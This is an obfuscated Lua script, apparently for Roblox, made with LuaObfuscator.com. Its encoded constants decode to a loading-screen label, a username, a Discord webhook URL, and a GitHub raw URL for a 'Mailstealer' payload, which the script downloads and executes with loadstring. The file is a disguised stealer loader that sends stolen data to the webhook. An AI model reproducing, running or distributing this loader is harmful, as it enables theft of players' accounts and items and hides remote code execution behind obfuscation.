--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v99=v5(v83,v19);v19=nil;return v99;else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%(((1 + 2) -1)^(((v33-(2 -1)) -(v32-(620 -(555 + (941 -(282 + 595)))))) + (932 -(857 + 74)))) ;return v84-(v84%(569 -(367 + 201))) ;else local v85=(1 + 1)^(v32-1) ;return (((v31%(v85 + v85))>=v85) and ((2565 -(1523 + 114)) -(214 + 713))) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + 0 ;local v36;local v37;while true do if (v35==(1 -0)) then return (v37 * ((1438 -(32 + 85)) -(68 + 997))) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (1272 -(226 + 1044)) ;v35=(4 + 0) -(1 + 2) ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (960 -((1242 -(87 + 263)) + 65)) );v18=v18 + (9 -5) ;return (v41 * 16777216) + (v40 * (121138 -55602)) + (v39 * ((649 -(67 + 113)) -213)) + v38 ;end local function v24()local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==((445 -(145 + 293)) -4)) then if (v47==(0 + 0)) then if (v46==(0 -0)) then return v48 * 0 ;else local v100=952 -(802 + 150) ;while true do if (v100==0) then v47=2 -1 ;v45=0;break;end end end elseif (v47==2047) then return ((v46==(0 -(430 -(44 + 386)))) and (v48 * ((1 + 0)/(997 -(915 + 82))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((5 -(1489 -(998 + 488)))^(31 + 21)))) ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=1188 -(1069 + 118) ;end if (v42==((2 + 2) -2)) then v47=v20(v44,45 -24 ,6 + 25 );v48=((v20(v44,32)==(1 -0)) and  -(1 + 0 + 0)) or (792 -((1140 -(201 + 571)) + 423)) ;v42=9 -6 ;end if (v42==((1157 -(116 + 1022)) -(10 + 8))) then v45=1;v46=(v20(v44,3 -2 ,462 -(416 + 26) ) * ((6 -4)^((58 -44) + 11 + 7))) + v43 ;v42=3 -1 ;end end end local function v25(v49)local v50=0 -0 ;local v51;local v52;while true do if (v50==(7 -5)) then v52={};for v88=860 -(814 + 45) , #v51 do v52[v88]=v2(v1(v3(v51,v88,v88)));end v50=7 -4 ;end if (v50==(1423 -(630 + 793))) then v51=nil;if  not v49 then v49=v23();if (v49==(0 + (0 -0))) then return "";end end v50=1 + 0 ;end if (v50==(886 -(261 + 624))) then v51=v3(v16,v18,(v18 + v49) -(1 -0) );v18=v18 + v49 ;v50=1082 -(1020 + 60) ;end if (v50==(14 -11)) then return v6(v52);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53~=(3 -0)) then else v60=nil;v61=nil;v53=1 + 3 ;end if (v53==(564 -(306 + 254))) then while true do if (v54~=3) then else v61=nil;while true do local v101=0 + 0 ;while true do if (v101==0) then local v102=0;while true do if (v102~=(1 -0)) then else v101=1;break;end if (v102==(1467 -(899 + 568))) then local v111=0 + 0 ;while true do if (v111~=0) then else if (v55~=(4 -2)) then else local v167=0;local v168;local v169;while true do if (v167==(604 -(268 + 335))) then while true do if (v168==0) then v169=0;while true do local v182=0;while true do if (v182==0) then if ((290 -(60 + 230))==v169) then for v190=1,v23() do local v191=0;local v192;local v193;local v194;while true do if (v191==1) then v194=nil;while true do if (v192==0) then local v197=572 -(426 + 146) ;while true do if (v197==1) then v192=1;break;end if (v197==(0 + 0)) then v193=1456 -(282 + 1174) ;v194=nil;v197=812 -(569 + 242) ;end end end if (1~=v192) then else while true do if (0~=v193) then else v194=v21();if (v20(v194,2 -1 ,1 + 0 )==(1024 -(706 + 318))) then local v200=1251 -(721 + 530) ;local v201;local v202;local v203;local v204;local v205;while true do if (v200==1) then v203=nil;v204=nil;v200=2;end if (v200~=(1271 -(945 + 326))) then else v201=0;v202=nil;v200=1;end if (v200==(4 -2)) then v205=nil;while true do if (v201==(2 + 0)) then while true do if (v202==(703 -(271 + 429))) then if (v20(v204,3,3)~=1) then else v205[4 + 0 ]=v61[v205[1504 -(1408 + 92) ]];end v56[v190]=v205;break;end if (v202==(1086 -(461 + 625))) then local v209=1288 -(993 + 295) ;while true do if (v209==(0 + 0)) then v203=v20(v194,2,1174 -(418 + 753) );v204=v20(v194,2 + 2 ,1 + 5 );v209=1 + 0 ;end if (v209==1) then v202=1;break;end end end if (v202~=(1 + 1)) then else if (v20(v204,1,530 -(406 + 123) )~=(1770 -(1749 + 20))) then else v205[1 + 1 ]=v61[v205[1324 -(1249 + 73) ]];end if (v20(v204,1 + 1 ,2)==1) then v205[3]=v61[v205[1148 -(466 + 679) ]];end v202=3;end if (v202==(2 -1)) then local v210=0 -0 ;while true do if (v210==1) then v202=2;break;end if (v210==(1900 -(106 + 1794))) then v205={v22(),v22(),nil,nil};if (v203==0) then local v217=114 -(4 + 110) ;local v218;while true do if (v217~=0) then else v218=0;while true do if ((584 -(57 + 527))==v218) then v205[1430 -(41 + 1386) ]=v22();v205[4]=v22();break;end end break;end end elseif (v203==1) then v205[3]=v23();elseif (v203==(105 -(17 + 86))) then v205[3]=v23() -((2 + 0)^16) ;elseif (v203==3) then local v223=0;local v224;local v225;local v226;while true do if (v223~=1) then else v226=nil;while true do if ((1 -0)~=v224) then else while true do if (v225~=(0 -0)) then else v226=0;while true do if ((166 -(122 + 44))==v226) then v205[3]=v23() -((2 -0)^(52 -36)) ;v205[4 + 0 ]=v22();break;end end break;end end break;end if ((0 + 0)~=v224) then else v225=0;v226=nil;v224=1 -0 ;end end break;end if (v223~=(65 -(30 + 35))) then else v224=0;v225=nil;v223=1 + 0 ;end end end v210=1;end end end end break;end if (v201~=1) then else local v206=1257 -(1043 + 214) ;while true do if (v206==(0 -0)) then v204=nil;v205=nil;v206=1213 -(323 + 889) ;end if (v206==(2 -1)) then v201=582 -(361 + 219) ;break;end end end if (v201~=0) then else local v207=0;while true do if (v207==(321 -(53 + 267))) then v201=1 + 0 ;break;end if (v207~=0) then else v202=413 -(15 + 398) ;v203=nil;v207=983 -(18 + 964) ;end end end end break;end end end break;end end break;end end break;end if (v191~=(0 -0)) then else v192=0;v193=nil;v191=1;end end end for v195=1,v23() do v57[v195-(1 + 0) ]=v28();end v169=1 + 0 ;end if (v169==1) then return v59;end break;end end end break;end end break;end if (v167==(850 -(20 + 830))) then v168=0 + 0 ;v169=nil;v167=127 -(116 + 10) ;end end end if ((1 + 0)==v55) then local v170=0;local v171;while true do if (v170==(738 -(542 + 196))) then v171=0;while true do if (v171==(0 -0)) then local v180=0;while true do if (v180~=(0 + 0)) then else v60=v23();v61={};v180=1 + 0 ;end if (v180==(1 + 0)) then v171=2 -1 ;break;end end end if (v171==(2 -1)) then local v181=1551 -(1126 + 425) ;while true do if ((405 -(118 + 287))==v181) then for v184=3 -2 ,v60 do local v185=0;local v186;local v187;local v188;local v189;while true do if (v185==1) then v188=nil;v189=nil;v185=2;end if (v185==2) then while true do if ((1122 -(118 + 1003))==v186) then v189=nil;while true do if (v187==1) then if (v188==(2 -1)) then v189=v21()~=0 ;elseif (v188==(379 -(142 + 235))) then v189=v24();elseif (v188~=(13 -10)) then else v189=v25();end v61[v184]=v189;break;end if (v187==0) then local v199=0;while true do if (v199==1) then v187=1 + 0 ;break;end if (0~=v199) then else v188=v21();v189=nil;v199=1;end end end end break;end if ((977 -(553 + 424))==v186) then v187=0 -0 ;v188=nil;v186=1 + 0 ;end end break;end if (v185~=0) then else v186=0;v187=nil;v185=1;end end end v59[3 + 0 ]=v21();v181=1 + 0 ;end if (v181~=1) then else v171=2;break;end end end if (v171==2) then v55=1 + 1 ;break;end end break;end end end v111=1;end if (v111==(1 + 0)) then v102=1;break;end end end end end if (v101==(2 -1)) then if ((0 -0)==v55) then local v108=0;local v109;local v110;while true do if (v108==1) then while true do if ((0 -0)==v109) then v110=0 + 0 ;while true do if (v110==0) then local v178=0 -0 ;while true do if (v178==1) then v110=754 -(239 + 514) ;break;end if (v178==(0 + 0)) then v56={};v57={};v178=1330 -(797 + 532) ;end end end if (v110~=(1 + 0)) then else local v179=0;while true do if (v179==1) then v110=2;break;end if (v179==0) then v58={};v59={v56,v57,nil,v58};v179=1;end end end if (v110~=(1 + 1)) then else v55=2 -1 ;break;end end break;end end break;end if (v108==0) then v109=1202 -(373 + 829) ;v110=nil;v108=732 -(476 + 255) ;end end end break;end end end break;end if (v54~=1) then else local v96=0;local v97;while true do if (v96==0) then v97=0;while true do if (v97==(1131 -(369 + 761))) then v54=2 + 0 ;break;end if (v97==0) then v57=nil;v58=nil;v97=1;end end break;end end end if (2==v54) then v59=nil;v60=nil;v54=5 -2 ;end if ((0 -0)==v54) then local v98=0;while true do if (0~=v98) then else v55=0;v56=nil;v98=239 -(64 + 174) ;end if (v98~=(1 + 0)) then else v54=1;break;end end end end break;end if (v53==1) then v56=nil;v57=nil;v53=2;end if (v53==(0 -0)) then v54=336 -(144 + 192) ;v55=nil;v53=217 -(42 + 174) ;end if (v53==(2 + 0)) then v58=nil;v59=nil;v53=3;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v87=0;while true do if (v87==0) then v80=v68[v72];v81=v80[1];v87=1;end if (v87==1) then if (v81<=5) then if (v81<=2) then if (v81<=0) then v64[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v64[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v72=v80[3];elseif (v81>1) then local v112=0;local v113;while true do if (v112==0) then v113=v80[2];v78[v113]=v78[v113](v13(v78,v113 + 1 ,v73));break;end end elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81<=3) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81>4) then do return;end else local v115=v80[2];local v116,v117=v71(v78[v115](v13(v78,v115 + 1 ,v80[3])));v73=(v117 + v115) -1 ;local v118=0;for v135=v115,v73 do local v136=0;while true do if (v136==0) then v118=v118 + 1 ;v78[v135]=v116[v118];break;end end end end elseif (v81<=8) then if (v81<=6) then v78[v80[2]]=v80[3]~=0 ;elseif (v81>7) then local v119=0;local v120;local v121;local v122;local v123;local v124;while true do if (7==v119) then v80=v68[v72];v124=v80[2];v78[v124]=v78[v124](v13(v78,v124 + 1 ,v73));v72=v72 + 1 ;v119=8;end if (v119==1) then v64[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v119=2;end if (v119==5) then v72=v72 + 1 ;v80=v68[v72];v124=v80[2];v121,v122=v71(v78[v124](v13(v78,v124 + 1 ,v80[3])));v119=6;end if (9==v119) then v72=v80[3];break;end if (v119==0) then v120=nil;v121,v122=nil;v123=nil;v124=nil;v119=1;end if (v119==4) then v78[v124]=v123[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v119=5;end if (v119==8) then v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v119=9;end if (v119==2) then v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;v119=3;end if (v119==3) then v80=v68[v72];v124=v80[2];v123=v78[v80[3]];v78[v124 + 1 ]=v123;v119=4;end if (v119==6) then v73=(v122 + v124) -1 ;v120=0;for v164=v124,v73 do v120=v120 + 1 ;v78[v164]=v121[v120];end v72=v72 + 1 ;v119=7;end end else v78[v80[2]]=v80[3];end elseif (v81<=10) then if (v81==9) then v72=v80[3];else local v128=v80[2];local v129=v78[v80[3]];v78[v128 + 1 ]=v129;v78[v128]=v129[v80[4]];end elseif (v81>11) then v78[v80[2]]();else v64[v80[3]]=v78[v80[2]];end v72=v72 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696C737465616C657256322F4D61696C737465616C65722F6D61696E2F763203083O00557365726E616D65030C3O003670657465726B75746B613903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3139323137363039323538393630393037312F52305456543053526C4D56347854533864505975584F347064554B594A596535483641716E666E476874685154736269374569304A376749654537386953597337516E7700163O0012073O00013O0026033O000D000100020004093O000D00012O000600015O001208000100033O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O001500010026033O0001000100010004093O00010001001207000100093O00122O000100083O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00053O00017O00",v9(),...);
